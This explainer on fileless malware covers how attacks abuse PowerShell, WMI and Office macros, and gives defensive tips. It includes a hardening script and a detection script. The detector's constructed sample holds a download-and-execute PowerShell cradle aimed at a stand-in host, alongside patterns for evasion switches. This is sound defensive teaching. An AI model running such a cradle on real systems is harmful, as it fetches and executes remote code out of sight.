Most phishing and malware scams follow a fairly predictable pattern:
- Unsuspecting users click on a suspicious link or open an attachment.
- In doing so, they unwittingly download a malicious program to disk and run it.
- Once running, that program gives its operator a foothold on the machine.
- The attacker then has whatever access the compromised account has to the computer's data (and, if that account is an administrator, to the whole machine).
This type of malware is a very real threat, but because the malicious program is written to disk, antivirus and built-in security tools have something to scan, hash and match against known signatures. Phishing campaigns of this kind succeed most often against machines that lack endpoint protection or run unpatched, out-of-date operating systems.
Now, there is an emerging class of attack that has security experts concerned. Known as "fileless attacks," and usually delivered by the same phishing lure, it does not install its own executable on the user's hard drive. Instead, it hijacks legitimate programs that are already present on the machine (above all the operating system's own scripting and management tools), essentially turning the computer against itself.
How Do Fileless Attacks Work?
Also known as "zero-footprint" or "non-malware" attacks, this technique is much harder to detect, precisely because no new file is written to disk for a scanner to find. Both labels overstate the case: the attack still leaves traces in memory, in process telemetry and in event logs, just not as a foreign file on the hard drive.
In most cases, the process works as follows:
- An unsuspecting user clicks on a suspicious link.
- The user lands on a web page that serves an exploit through Flash or another browser component (or, just as commonly, opens an Office document that asks them to enable macros).
- The exploit or macro launches an already-installed, trusted tool such as Windows PowerShell and hands it instructions: typically a short command that downloads a script and executes it straight from memory. The payload lives in RAM; nothing new is written to the hard drive.
- The attacker can then intercept information sent or received through that computer and run further commands with whatever privileges the victim's account holds. If the victim is a local administrator, so is the attacker.
Fileless Malware Examples (That Don’t Use Flash)
You might be thinking, “No problem. Our organization doesn’t ever use Flash.”
But not so fast. There are many fileless malware examples in which criminals successfully exploited vulnerabilities in browsers, various Microsoft products and countless other tools.
No matter what entry point is used, the underlying threat remains the same since fileless attacks hijack legitimate software programs that have already been installed on the user’s machine.
Because the malicious code exists only in RAM, there is no foreign file for signature-based antivirus to flag. Fileless attacks also slip past application whitelisting, the control by which administrators approve which programs are allowed to run, because the programs doing the work (PowerShell, Windows Management Instrumentation, the Office applications themselves) are ones the administrator has already approved.
To make matters worse, a foothold on one machine can be used to move laterally to other computers on the same network, frequently with the same built-in remote-administration tools. So even if you're diligent about not clicking on suspicious links, you're not necessarily safe. If a family member or colleague gets hit by a fileless attack, your machine is also at risk.
Fileless Malware Protection: The Good and the Bad
One of the reasons why security experts are so concerned is that fileless attacks are incredibly effective:
- In the absence of locally stored files, detecting new fileless malware examples is very difficult.
- Once a single networked computer is infected, the damage can quickly spread laterally to other machines.
According to a 2017 Ponemon Institute survey of endpoint security, fileless attacks are estimated to be 10 times more likely to succeed than their file-based counterparts, and 77 percent of the successful compromises reported by respondents that year involved fileless techniques.
Even though this new cyber threat is on the rise, fileless malware protection has yet to crystallize around a foolproof body of best practices.
However, there are some common-sense strategies you can implement to make yourself less of a target.
1. Don’t Click on Suspicious Links
This fileless malware protection tip is both deceptively easy and difficult at the same time, because “suspicious” links are becoming increasingly less suspicious. Criminals know how to dress their emails, websites and text messages to look like legitimate pieces of communication.
Case in point: If someone sent you this article with the subject line “Common Fileless Malware Examples and How to Stop Them” — you’d probably click on it, right?
Now imagine that a hacker sent you the same message and subject line — but instead of bringing you here, the embedded link took you to a dodgy website.
2. Keep Your Machines Up-To-Date
Run a supported, current version of your operating system and of the applications that sit on the delivery path (browser, Flash if you still have it, Office), and install patches promptly. The exploits that give most mass phishing campaigns their initial foothold target bugs for which a fix has already shipped.
3. Disable Non-Essential Tools
If you're on a Windows machine, you should restrict PowerShell, Windows Management Instrumentation (WMI) and Office macros unless these tools are vital to your organization's operations. All three are legitimate components provided by Microsoft, which is exactly why attackers favour them: they are already installed, already trusted and already whitelisted. In practice this means disabling macros (at minimum for documents that arrived from the internet), turning on PowerShell script-block logging and removing the legacy PowerShell 2.0 engine, and auditing WMI activity rather than trying to switch it off, since Windows itself depends on it.
If you don't know what these tools are, your users are probably not relying on them directly, but Windows and your management software may be, so test the restrictions on a pilot group before rolling them out.
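Disabling PowerShell outright is rarely possible and WMI cannot be removed, so "disable" in practice means constrain and log. The script below is an added example, not code from the original article or from Microsoft; it applies the documented Group Policy registry values for blocking internet-sourced Office macros, enabling PowerShell script-block and module logging, and removing the PowerShell 2.0 engine, then reads the resulting state back. It must run from an elevated prompt, and the Office version key (16.0) and the three-application list are assumptions to adjust for your own estate.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the original article). Hardens the three components named in tip 3
# using the documented policy registry values, then reports what is in effect.

function Set-PolicyValue {
    param([string]$Path, [string]$Name, [int]$Value)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -PropertyType DWord -Value $Value -Force | Out-Null
}

# 1. Office macros (per-user policy hive; 16.0 = Office 2016/2019/365, an assumption).
#    blockcontentexecutionfrominternet: block macros in files carrying Mark-of-the-Web.
#    VBAWarnings: 2 = disable with notification, 3 = disable all except signed, 4 = disable silently.
foreach ($app in 'Word', 'Excel', 'PowerPoint') {
    $sec = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
    Set-PolicyValue -Path $sec -Name 'blockcontentexecutionfrominternet' -Value 1
    Set-PolicyValue -Path $sec -Name 'VBAWarnings' -Value 3
}

# 2. PowerShell: cannot be removed (Windows depends on it), so make it observable.
#    Script-block logging writes the de-obfuscated script text to Event ID 4104 in
#    Microsoft-Windows-PowerShell/Operational, including code passed via -EncodedCommand.
$psPol = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
Set-PolicyValue -Path "$psPol\ScriptBlockLogging" -Name 'EnableScriptBlockLogging' -Value 1
Set-PolicyValue -Path "$psPol\ModuleLogging"      -Name 'EnableModuleLogging'      -Value 1
$mods = "$psPol\ModuleLogging\ModuleNames"
if (-not (Test-Path $mods)) { New-Item -Path $mods -Force | Out-Null }
New-ItemProperty -Path $mods -Name '*' -Value '*' -PropertyType String -Force | Out-Null

# 3. Remove the PowerShell 2.0 engine: it predates script-block logging and AMSI, so attackers
#    request it with "-Version 2" to silence both. Shipped as an optional feature on Windows 10.
$v2Name = 'MicrosoftWindowsPowerShellV2Root'
$v2 = Get-WindowsOptionalFeature -Online -FeatureName $v2Name -ErrorAction SilentlyContinue
if ($v2 -and $v2.State -eq 'Enabled') {
    Disable-WindowsOptionalFeature -Online -FeatureName $v2Name -NoRestart | Out-Null
}

# 4. Read back. FullLanguage means any script can call .NET and COM directly; ConstrainedLanguage
#    (enforced via a WDAC or AppLocker policy, not a registry flag) is what blunts in-memory tooling.
function Get-HardeningReport {
    [pscustomobject]@{
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode
        ScriptBlockLogging = (Get-ItemProperty "$psPol\ScriptBlockLogging" -ErrorAction SilentlyContinue).EnableScriptBlockLogging
        ModuleLogging      = (Get-ItemProperty "$psPol\ModuleLogging" -ErrorAction SilentlyContinue).EnableModuleLogging
        WordMacroPolicy    = (Get-ItemProperty 'HKCU:\Software\Policies\Microsoft\Office\16.0\Word\Security' -ErrorAction SilentlyContinue).VBAWarnings
        PowerShellV2       = (Get-WindowsOptionalFeature -Online -FeatureName $v2Name -ErrorAction SilentlyContinue).State
    }
}
Get-HardeningReport
```

The 4104 events that script-block logging produces contain the decoded text of anything run through -EncodedCommand, which is what makes the monitoring tip below workable on the host side. For WMI, audit rather than disable: the Microsoft-Windows-WMI-Activity/Operational log records who is issuing queries and creating event subscriptions. Constrained Language Mode is only reported here because it has to be enforced through an application-control policy.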
4. Monitor Your Network’s Traffic
This step has less to do with fileless malware protection and more to do with detection. On the network, watch for activity your team can't account for: workstations opening connections to unfamiliar external hosts, or one workstation suddenly talking to many of its neighbours. Those blips can indicate that someone has unauthorized access to one of your organization's machines. On the host, process-creation auditing (which program spawned PowerShell, and with what command line) and PowerShell script-block logging catch the pattern described above far more reliably than bandwidth graphs do.
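The procedure sketched under "How Do Fileless Attacks Work?" leaves no file, but it does leave a recognisable shape in process telemetry: a document viewer or browser spawns powershell.exe with window-hiding switches and an encoded download-and-execute command. The script below is an added example, not code from the original article or from any vendor product, and it serves both that section and this monitoring tip. It scores constructed process-creation records (field names follow Sysmon Event ID 1 and Security Event 4688) for that pattern; the scoring threshold, the parent-process list and the sample records are assumptions for the demo, and on a real host you would feed it records read with Get-WinEvent instead.

```powershell
# Added example (not from the original article): flag "trusted app spawns in-memory PowerShell".
Set-StrictMode -Version Latest

function Get-Leaf {
    # Last path component; split on both separators so the demo also runs on PowerShell 7/Linux.
    param([string]$Path)
    return ($Path -split '[\\/]')[-1]
}

function Get-EncodedCommandText {
    # powershell.exe accepts -EncodedCommand or any unambiguous prefix (-e, -ec, -enc, ...);
    # the argument is Base64 of UTF-16LE script text. Returns the decoded script, or $null.
    param([Parameter(Mandatory)][string]$CommandLine)
    if ($CommandLine -match '(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }
    }
    return $null
}

function Test-FilelessPowerShell {
    # Scores one process-creation record and returns Suspicious / Score / Reasons.
    param([Parameter(Mandatory)]$Record)

    $reasons = New-Object 'System.Collections.Generic.List[string]'
    $image   = Get-Leaf $Record.Image
    $parent  = Get-Leaf $Record.ParentImage

    if ($image -notin 'powershell.exe', 'pwsh.exe', 'powershell_ise.exe') {
        return [pscustomobject]@{ Suspicious = $false; Score = 0; Reasons = @() }
    }

    # 1. Parent process: document viewers and browsers have no business spawning a shell.
    $userApps = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE',
                'chrome.exe', 'firefox.exe', 'msedge.exe', 'iexplore.exe'
    if ($parent -in $userApps) { $reasons.Add("parent is a user-facing app: $parent") }

    # 2. Switches that hide the window or sidestep policy. Admin scripts use them too,
    #    so each is one point, not a verdict.
    foreach ($flag in '-w(?:indowstyle)?\s+hidden', '-nop(?:rofile)?', '-noni(?:nteractive)?',
                      '-ex(?:ec|ecutionpolicy)?\s+bypass') {
        if ($Record.CommandLine -match "(?i)$flag") { $reasons.Add("switch: $($Matches[0].Trim())") }
    }

    # 3. Decode -EncodedCommand so Base64 cannot hide the payload, then look for
    #    download-and-run-in-memory primitives in both the raw and the decoded text.
    $decoded = Get-EncodedCommandText -CommandLine $Record.CommandLine
    if ($decoded) { $reasons.Add('encoded command present') }
    $text = "$($Record.CommandLine) $decoded"
    foreach ($prim in 'DownloadString', 'DownloadData', 'Invoke-WebRequest', '\biwr\b',
                      'Invoke-Expression', '\biex\b', 'Net\.WebClient', 'FromBase64String', 'Reflection\.Assembly') {
        if ($text -match "(?i)$prim") { $reasons.Add("in-memory primitive: $prim") }
    }

    [pscustomobject]@{ Suspicious = ($reasons.Count -ge 3); Score = $reasons.Count; Reasons = $reasons.ToArray() }
}

# Constructed sample input (not real telemetry). Record 1 models the macro-spawns-PowerShell case
# from the article, with the cradle Base64-encoded the way attackers pass it; example.invalid is a
# reserved name that never resolves. Records 2 and 3 are benign controls.
$cradle  = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
$records = @(
    [pscustomobject]@{ ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
                       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc $encoded" }
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\notepad.exe'
                       CommandLine = 'notepad.exe C:\Users\alice\notes.txt' }
)

foreach ($r in $records) {
    $v = Test-FilelessPowerShell -Record $r
    '{0,-13} -> suspicious={1} score={2} [{3}]' -f (Get-Leaf $r.ParentImage), $v.Suspicious, $v.Score, ($v.Reasons -join '; ')
}
```

The Word-spawned record scores on every axis, while the scheduled backup script trips only one heuristic (-NoProfile) and stays below the threshold, which is why a single switch counts as a point rather than a verdict. The decode step is the one that matters most: without it, the cradle is just an opaque Base64 blob and the word "DownloadString" never appears in the command line you are inspecting.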
5. Implement the ‘Principle of Least Privilege’
You should restrict every employee's access rights on a need-to-know basis. Lower-level staffers, for example, don't need administrative privileges if they're only working on data entry. A fileless payload that runs as a standard user inherits that user's limits: it cannot turn off logging, install itself system-wide or read other users' data on the machine.
6. Consider Third-Party Solutions
Traditional signature-based antivirus is poor at detecting or preventing fileless attacks, but a growing number of endpoint detection and response (EDR) products watch process behaviour and script execution in memory, which is exactly the gap these attacks exploit. Evaluate vendor claims against the specific techniques described above (an Office application spawning a shell, encoded PowerShell commands, scripts executed straight from memory) rather than taking them at face value.
A Final Fileless Malware Protection Tip
Fileless attacks are hard to detect, prevent and contain. This is especially true if you lack the IT and security know-how to:
- Monitor network traffic
- Assign admin roles
- Disable or constrain non-essential tools
There is one final step you can take to protect yourself, and it’s a bit drastic.
Although no operating system is 100 percent immune from fileless attacks, the fileless malware examples above target Windows tooling (PowerShell, WMI, Office macros), and macOS, Chrome OS and Linux each ship their own scripting interpreters that can be abused the same way. If all else fails, moving your organization's computers to one of those platforms takes you out of the pool that mass Windows-focused campaigns aim at, but treat it as a change of exposure, not a cure.